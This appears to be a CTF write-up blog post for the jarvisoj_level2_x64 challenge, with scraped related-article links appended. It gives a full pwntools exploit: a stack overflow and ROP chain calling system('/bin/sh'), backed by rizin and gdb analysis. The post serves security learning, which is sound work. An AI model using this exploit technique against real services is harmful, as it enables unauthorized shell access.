Here i finish the jarvisoj_level2_x64 1 challenge in buuctf and here is some writeup

(i use English to write this blog for protecting it from CSDN )

i will post my code here and explain it

code

  1. from pwn import *
  2. len = 128 + 8 # filling the stack also RBP
  3. payload = b'a'*len
  4. evil_addr = 0x00000000004006b3 # pop rdi ret
  5. evil_addr1 = 0x00400603 # call sym.imp.system
  6. e = ELF("level2_x64")
  7. sh_addr = 0x00600a90
  8. system_plt = e.plt['system']
  9. payload += p64(evil_addr) + p64(sh_addr) + p64(evil_addr1)
  10. p = process("./level2_x64")
  11. #pause()
  12. p.sendline(payload);
  13. p.interactive()

Analyse the code

using rizin for static analyse and using gdb for dyn

  1. > rizin level2_x64
  2. [0x00400500]> iE
  3. nth paddr vaddr bind type size lib name
  4. ---------------------------------------------------------------------
  5. 45 0x000006c0 0x004006c0 GLOBAL FUNC 2 __libc_csu_fini
  6. 48 ---------- 0x00600a98 GLOBAL NOTYPE 0 _edata
  7. 49 0x000006c4 0x004006c4 GLOBAL FUNC 0 _fini
  8. 51 0x000005f6 0x004005f6 GLOBAL FUNC 42 vulnerable_function
  9. 54 0x00000a80 0x00600a80 GLOBAL NOTYPE 0 __data_start
  10. 56 0x00000a88 0x00600a88 GLOBAL OBJ 0 __dso_handle
  11. 57 0x000006d0 0x004006d0 GLOBAL OBJ 4 _IO_stdin_used
  12. 58 0x00000650 0x00400650 GLOBAL FUNC 101 __libc_csu_init
  13. 59 ---------- 0x00600aa0 GLOBAL NOTYPE 0 _end
  14. 60 0x00000500 0x00400500 GLOBAL FUNC 0 _start
  15. 61 ---------- 0x00600a98 GLOBAL NOTYPE 0 __bss_start
  16. 62 0x00000620 0x00400620 GLOBAL FUNC 37 main
  17. 63 0x00000a90 0x00600a90 GLOBAL OBJ 8 hint
  18. 65 ---------- 0x00600a98 GLOBAL OBJ 0 __TMC_END__
  19. 67 0x00000488 0x00400488 GLOBAL FUNC 0 _init

We will dive into main function and vulnerable_function

Let's try main first

also using rizin to decompile it here is the result

  1. [0x00400620]> pdg
  2. void main(int argc, char **argv)
  3. {
  4. char **var_18h;
  5. int var_ch;
  6. sym.vulnerable_function();
  7. sym.imp.system("echo \'Hello World!\'");
  8. return;
  9. }

Now go into the vulnerable_function for more details

  1. void sym.vulnerable_function(void)
  2. {
  3. void *buf;
  4. sym.imp.system("echo Input:");
  5. sym.imp.read(0, &buf, 0x200);
  6. return;
  7. }

Something strange , notice the read funtion's so i will check the assemble code for more

  1. [0x004005f6]> pdf
  2. ; CALL XREF from main @ 0x400634
  3. sym.vulnerable_function();
  4. ; var void *buf @ stack - 0x88
  5. 0x004005f6 push rbp
  6. 0x004005f7 mov rbp, rsp
  7. 0x004005fa add rsp, 0xffffffffffffff80
  8. 0x004005fe mov edi, str.echo_Input: ; 0x4006d4 ; "echo Input:" ; const char *string
  9. 0x00400603 call sym.imp.system ; sym.imp.system ; int system(const char *string)
  10. 0x00400608 lea rax, [buf]
  11. 0x0040060c mov edx, 0x200 ; 512 ; size_t nbyte
  12. 0x00400611 mov rsi, rax ; void *buf
  13. 0x00400614 mov edi, 0 ; int fildes
  14. 0x00400619 call sym.imp.read ; sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
  15. 0x0040061e leave
  16. 0x0040061f ret

now, the read function's distinct address is pointer into the [buf] which is about locate in stack

here is recive the 0x200 bytes it may be much more larger for the stack , and there is also without canary protection so we can dive into stack overflow via read function

dyn debug

we use gdb for dyn debug to found the exactly number of payload of stack overflow

  1. > gdb vulnerable_function
  2. > c
  3. (gdb) disassemble
  4. Dump of assembler code for function vulnerable_function:
  5. 0x00000000004005f6 <+0>: push %rbp
  6. 0x00000000004005f7 <+1>: mov %rsp,%rbp
  7. => 0x00000000004005fa <+4>: add $0xffffffffffffff80,%rsp
  8. 0x00000000004005fe <+8>: mov $0x4006d4,%edi
  9. 0x0000000000400603 <+13>: call 0x4004c0 <system@plt>
  10. 0x0000000000400608 <+18>: lea -0x80(%rbp),%rax
  11. 0x000000000040060c <+22>: mov $0x200,%edx
  12. 0x0000000000400611 <+27>: mov %rax,%rsi
  13. 0x0000000000400614 <+30>: mov $0x0,%edi
  14. 0x0000000000400619 <+35>: call 0x4004d0 <read@plt>
  15. 0x000000000040061e <+40>: leave
  16. 0x000000000040061f <+41>: ret
  17. End of assembler dump.
  18. (gdb) b *vulnerable_function+40
  19. (gdb) c
  20. Continuing.
  21. [Detaching after vfork from child process 730797]
  22. Input:
  23. AAAAAAAA

now we input 8 A into stack let's check where are they so that calculate the exactly length

  1. gdb) x/64wx $rsp
  2. 0x7fffffffe3b0: 0x41414141 0x41414141 0x0000080a 0x00000000
  3. 0x7fffffffe3c0: 0x00000002 0x00000000 0x00000006 0x80000000
  4. 0x7fffffffe3d0: 0x00000000 0x00000000 0x00000000 0x00000000
  5. 0x7fffffffe3e0: 0x00000000 0x00000000 0x00000000 0x00000000
  6. 0x7fffffffe3f0: 0x00000000 0x00000000 0x00000000 0x00000000
  7. 0x7fffffffe400: 0x00000000 0x00000000 0x00000000 0x00000000
  8. 0x7fffffffe410: 0x00000000 0x00000000 0x00000000 0x00000000
  9. 0x7fffffffe420: 0x00000000 0x00000000 0x00000000 0x00000000
  10. 0x7fffffffe430: 0xffffe450 0x00007fff 0x00400639 0x00000000
  11. 0x7fffffffe440: 0xffffe578 0x00007fff 0xffffe578 0x00000001
  12. 0x7fffffffe450: 0xffffe4f0 0x00007fff 0xf7db7e08 0x00007fff
  13. 0x7fffffffe460: 0xffffe4a0 0x00007fff 0xffffe578 0x00007fff
  14. 0x7fffffffe470: 0x00400040 0x00000001 0x00400620 0x00000000
  15. 0x7fffffffe480: 0xffffe578 0x00007fff 0x2ef7ab9e 0x5b0c92b4
  16. 0x7fffffffe490: 0x00000001 0x00000000 0x00000000 0x00000000
  17. 0x7fffffffe4a0: 0xf7ffd000 0x00007fff 0x00000000 0x00000000
  18. (gdb) p $rbp
  19. $1 = (void *) 0x7fffffffe430

it is obvious that we just need the length about |0x7fffffffe3b0-0x7fffffffe430| + 8

(just explain why you need add 8 : because we just calculate the length from rsp low address into rbp low address , but we need length from rsp low address into rbp high address , so we add 8 for x64 arch machine)

now,we just exploit the vulnerable_function , and we can controller the program to execute any code locate in the program

But what we wanna is get a bash shell or something can execute command

we have two choices

I. allocate a memory and write shellcode into it then go to execute it

II. go to somewhere and change args to get our target

For I , it is hard to do this,cause we just can go to any where ,we could not actually allocate memory and write something into it(maybe we can using a brunch of pop|ret command and go to libc to allocate memory which need more details about the program)

For II ,it is much easier,Attention ,there is something special for us

do you remember the first output

  1. [0x00400500]> iE
  2. nth paddr vaddr bind type size lib name
  3. ---------------------------------------------------------------------
  4. 45 0x000006c0 0x004006c0 GLOBAL FUNC 2 __libc_csu_fini
  5. 48 ---------- 0x00600a98 GLOBAL NOTYPE 0 _edata
  6. 49 0x000006c4 0x004006c4 GLOBAL FUNC 0 _fini
  7. 51 0x000005f6 0x004005f6 GLOBAL FUNC 42 vulnerable_function
  8. 54 0x00000a80 0x00600a80 GLOBAL NOTYPE 0 __data_start
  9. 56 0x00000a88 0x00600a88 GLOBAL OBJ 0 __dso_handle
  10. 57 0x000006d0 0x004006d0 GLOBAL OBJ 4 _IO_stdin_used
  11. 58 0x00000650 0x00400650 GLOBAL FUNC 101 __libc_csu_init
  12. 59 ---------- 0x00600aa0 GLOBAL NOTYPE 0 _end
  13. 60 0x00000500 0x00400500 GLOBAL FUNC 0 _start
  14. 61 ---------- 0x00600a98 GLOBAL NOTYPE 0 __bss_start
  15. 62 0x00000620 0x00400620 GLOBAL FUNC 37 main
  16. 63 0x00000a90 0x00600a90 GLOBAL OBJ 8 hint
  17. 65 ---------- 0x00600a98 GLOBAL OBJ 0 __TMC_END__
  18. 67 0x00000488 0x00400488 GLOBAL FUNC 0 _init

there is a hint in 0x00600a90 address

let check what it is

  1. [0x00400500]> px @ 0x00600a90
  2. - offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
  3. 0x00600a90 2f62 696e 2f73 6800 0000 0000 0000 0000 /bin/sh.........
  4. 0x00600aa0 ffff ffff ffff ffff 0000 0000 0000 0000 ................
  5. 0x00600ab0 0000 0000 0000 0000 0000 0000 0000 0000 ................
  6. 0x00600ac0 0000 0000 0000 0000 0000 0000 0000 0000 ................
  7. 0x00600ad0 ffff ffff ffff ffff ffff ffff ffff ffff ................
  8. 0x00600ae0 ffff ffff ffff ffff ffff ffff ffff ffff ................
  9. 0x00600af0 ffff ffff ffff ffff ffff ffff ffff ffff ................
  10. 0x00600b00 ffff ffff ffff ffff ffff ffff ffff ffff ................
  11. 0x00600b10 ffff ffff ffff ffff ffff ffff ffff ffff ................
  12. 0x00600b20 ffff ffff ffff ffff ffff ffff ffff ffff ................
  13. 0x00600b30 ffff ffff ffff ffff ffff ffff ffff ffff ................
  14. 0x00600b40 ffff ffff ffff ffff ffff ffff ffff ffff ................
  15. 0x00600b50 ffff ffff ffff ffff ffff ffff ffff ffff ................
  16. 0x00600b60 ffff ffff ffff ffff ffff ffff ffff ffff ................
  17. 0x00600b70 ffff ffff ffff ffff ffff ffff ffff ffff ................
  18. 0x00600b80 ffff ffff ffff ffff ffff ffff ffff ffff ................

it is a string contains '/bin/sh' which can be a args for system to spawn a bash shell

ok ,now find the system function ,we just need assembly code like "call systemm;"

We almost win the game!

Firsh we need found the assemble code "call system"

before we go to here we need replace the original argvs with '/bin/sh'

is it similar ,yeah , we had seen it in vulnerable_function

  1. [0x004005f6]> pdf
  2. ; CALL XREF from main @ 0x400634
  3. sym.vulnerable_function();
  4. ; var void *buf @ stack - 0x88
  5. 0x004005f6 push rbp
  6. 0x004005f7 mov rbp, rsp
  7. 0x004005fa add rsp, 0xffffffffffffff80
  8. 0x004005fe mov edi, str.echo_Input: ; 0x4006d4 ; "echo Input:" ; const char *string
  9. 0x00400603 call sym.imp.system ; sym.imp.system ; int system(const char *string)
  10. 0x00400608 lea rax, [buf]
  11. 0x0040060c mov edx, 0x200 ; 512 ; size_t nbyte
  12. 0x00400611 mov rsi, rax ; void *buf
  13. 0x00400614 mov edi, 0 ; int fildes
  14. 0x00400619 call sym.imp.read ; sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
  15. 0x0040061e leave
  16. 0x0040061f ret

now the can go to 0x00400603 with edi pointer '/bin/sh'

ROP

if you do not understand what ROP is, just go to learn it and come back continue

  1. ⋊> ~/solve ROPgadget --binary level2_x64 --only "pop|ret" |grep rdi 10:29:20
  2. 0x00000000004006b3 : pop rdi ; ret

so we got one gadget ,it is enough

we got the flag !

Here is what stack is after we send payload

  1. (gdb) x/64wx $rsp
  2. rsp-> 0x7ffc0a0ce240: 0x61616161 0x61616161 0x61616161 0x61616161
  3. 0x7ffc0a0ce250: 0x61616161 0x61616161 0x61616161 0x61616161
  4. 0x7ffc0a0ce260: 0x61616161 0x61616161 0x61616161 0x61616161
  5. 0x7ffc0a0ce270: 0x61616161 0x61616161 0x61616161 0x61616161
  6. 0x7ffc0a0ce280: 0x61616161 0x61616161 0x61616161 0x61616161
  7. 0x7ffc0a0ce290: 0x61616161 0x61616161 0x61616161 0x61616161
  8. 0x7ffc0a0ce2a0: 0x61616161 0x61616161 0x61616161 0x61616161
  9. 0x7ffc0a0ce2b0: 0x61616161 0x61616161 0x61616161 0x61616161
  10. rbp-> 0x7ffc0a0ce2c0: 0x61616161 0x61616161 0x004006b3 0x00000000 <- return address (pop rdi ;ret)
  11. sh-> 0x7ffc0a0ce2d0: 0x00600a90 0x00000000 0x00400603 0x00000000 <-call system address
  12. 0x7ffc0a0ce2e0: 0x0a0ce30a 0x00007ffc 0xd226fe08 0x00007897
  13. 0x7ffc0a0ce2f0: 0x0a0ce330 0x00007ffc 0x0a0ce408 0x00007ffc
  14. 0x7ffc0a0ce300: 0x00400040 0x00000001 0x00400620 0x00000000
  15. 0x7ffc0a0ce310: 0x0a0ce408 0x00007ffc 0xd585d4a1 0x05f8e39e
  16. 0x7ffc0a0ce320: 0x00000001 0x00000000 0x00000000 0x00000000
  17. 0x7ffc0a0ce330: 0xd24b5000 0x00007897 0x00000000 0x00000000

it will return to address 0x4006b3 which contains assemble code "pop rdi;ret"

now it execute pop rdi which pop the next address into rdi , yeah it is sh_address

then execute ret command again , which is equ "pop rip" ,so it return to "call system"

Finally you got the bash shell

Thanks for viewing

jarvisoj_level2_x64 1 writeup and blog的更多相关文章

  1. xss练习平台及writeup

    今天玩了一天的xss. 分享几个xss game https://xss.haozi.me/#/0x00 http://47.94.13.75/test/  writeup:http://www.cn ...

  2. 2016第七季极客大挑战Writeup

    第一次接触CTF,只会做杂项和一点点Web题--因为时间比较仓促,写的比较简略.以后再写下工具使用什么的. 纯新手,啥都不会.处于瑟瑟发抖的状态. 一.MISC 1.签到题 直接填入题目所给的SYC{ ...

  3. ISCC2016 WriteUp

    日期: 2016-05-01~ 注:隔了好久才发布这篇文章,还有两道Pwn的题没放,过一阵子放上.刚开始做这个题,后来恰巧赶上校内CTF比赛,就把重心放在了那个上面. 这是第一次做类似于CTF的题,在 ...

  4. 参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp

    洒家近期参加了 Tokyo Westerns / MMA CTF 2nd 2016(TWCTF) 比赛,不得不说国际赛的玩法比国内赛更有玩头,有的题给洒家一种一看就知道怎么做,但是做出来还需要洒家拍一 ...

  5. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  6. NCTF2018 Easy_Audit的writeup

    题目直接给出来代码 这题考几个点: 1.$_REQUEST的变量覆盖 2.编码绕过 3.PHP数组特性 4.正则绕过 5.file_get_contents函数 首先一步步把题目分析一遍 if($_R ...

  7. ctf题目writeup(1)

    2019/1/28 题目来源:爱春秋 https://www.ichunqiu.com/battalion?t=1 1. 该文件是一个音频文件: 首先打开听了一下,有短促的长的....刚开始以为是摩斯 ...

  8. 2019年领航杯 江苏省网络信息安全竞赛 初赛部分writeup

    赛题已上传,下载连接:https://github.com/raddyfiy/2019linghangcup 做出了全部的misc和前三道逆向题,排名第10,暂且贴一下writeup. 关卡一 编码解 ...

  9. XCTF攻防世界Web之WriteUp

    XCTF攻防世界Web之WriteUp 0x00 准备 [内容] 在xctf官网注册账号,即可食用. [目录] 目录 0x01 view-source2 0x02 get post3 0x03 rob ...

  10. 31C3 CTF web关writeup

    0x00 背景 31c3 CTF 还是很人性化的,比赛结束了之后还可以玩.看题解做出了当时不会做的题目,写了一个writeup. 英文的题解可以看这:https://github.com/ctfs/w ...

随机推荐

  1. 线性dp:LeetCode674. 最长连续递增序列

    LeetCode674. 最长连续递增序列 阅读本文之前,需要先了解"动态规划方法论",这在我的文章以前有讲过 链接:动态规划方法论 本文之前也讲过一篇文章:最长递增子序列,这道题 ...

  2. 组合数取模的几种方法--Exlucas&杨辉三角&组合

    组合数取模的几个方法 求: \[C^{m}_{n} \bmod P \] 1.杨辉三角法 \[C^{m}_{n} = C^{m - 1}_{n - 1} + C^{ m }_{n - 1} \] 时间 ...

  3. 全网最适合入门的面向对象编程教程:38 Python常用复合数据类型-使用列表实现堆栈、队列和双端队列

    全网最适合入门的面向对象编程教程:38 Python 常用复合数据类型-使用列表实现堆栈.队列和双端队列 摘要: 在 Python 中,列表(list)是一种非常灵活的数据结构,可以用来实现堆栈(st ...

  4. github拉取项目执行npm i 失败的问题

    一般卡在core-js没反应,然后报错的第一行是和node-sass有关的,基本上都是node-sass版本问题,这时候只需要在命令行输入两行代码就行 先把原来的依赖删掉 npm uni node-s ...

  5. Go context 介绍

    在 Go 编程语言中,context 包提供了一个用于在 goroutine 之间传递上下文信息的方法.它通常用于控制 goroutine 的生命周期.传递请求范围内的数据.以及处理超时或取消信号.c ...

  6. Gluon 编译 JavaFx -> android apk

    Gluon 编译 JavaFx -> android apk 本文的内容属 在linux服务器上 搭建 Gluon 编译 android-apk 环境 这一篇文章直接跟着官网操作一次性成功 虚拟 ...

  7. PlugIR:开源还不用微调,首尔大学提出即插即用的多轮对话图文检索 | ACL 2024

    即插即用的PlugIR通过LLM提问者和用户之间的对话逐步改进文本查询以进行图像检索,然后利用LLM将对话转换为检索模型更易理解的格式(一句话).首先,通过重新构造对话形式上下文消除了在现有视觉对话数 ...

  8. Goby漏洞发布 | 0day NACOS /nacos/v1/cs/ops/data/removal RCE代码执行漏洞【已验证】

    漏洞名称:NACOS /nacos/v1/cs/ops/data/removal RCE代码执行漏洞 English Name:NACOS /nacos/v1/cs/ops/data/removal ...

  9. mongo集群同步数据异常,手动同步节点副本数据

    转载请注明出处: 数据同步方案 当副本集节点的复制进程落后太多,以至于主节点覆盖了该节点尚未复制的 oplog 条目时,副本集节点就会变为"陈旧".节点跟不上,就会变得" ...

  10. String 的 intern() 方法

    问题: String s1 = "a" + "b"; //创建了几个对象? String s2 = new String("ab"); // ...